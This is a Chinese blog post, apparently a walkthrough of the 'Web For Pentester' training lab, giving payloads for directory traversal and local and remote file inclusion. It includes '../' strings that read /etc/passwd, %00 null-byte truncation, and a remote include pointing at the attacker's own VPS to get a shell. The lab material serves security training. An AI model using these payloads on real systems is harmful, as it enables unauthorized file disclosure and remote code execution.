首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Web For Pentester - Directory traversal & File Include Part Tips

Web For Pentester - Directory traversal & File Include Part Tips

作者头像
风流
发布2018-06-07 13:43:21
7570
发布2018-06-07 13:43:21
举报
文章被收录于专栏:Urahara BlogUrahara Blog

Directory traversal Part

Example 1

最基础的目录穿越造成的任意文件读取,这里为相对路径,通过“../”可进行目录跳转

file=/../../../../../../../../etc/passwd

Example 2

路径显示为网站物理路径,直接改为/etc/passwd不成功,通过../进行目录穿越

file=/var/www/files/../../../etc/passwd

Example 3

这里可以看出文件名后缀被写死到了程序当中,使用%00进行截断

file=../../../../../../../../../etc/passwd%00

File Include Part

Example 1

使用单引号报错可以看到程序抛出了异常,这里爆出了网站物理路径,并在程序中使用include()函数,当然可以使用目录穿越去包含本地/etc/passwd文件,也可以使用远程文件包含去getshell

page=/../../../../../../../../etc/passwd

page=http://vps地址/phpinfo.txt

Example 2

与Directory traversal Part中的Example 3类似,通过%00去截断

page=/../../../../../../../../etc/passwd%00

page=http://vps地址/phpinfo.txt%00

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • Directory traversal Part
    • Example 1
      • Example 2
        • Example 3
        • File Include Part
          • Example 1
            • Example 2
            领券
            问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档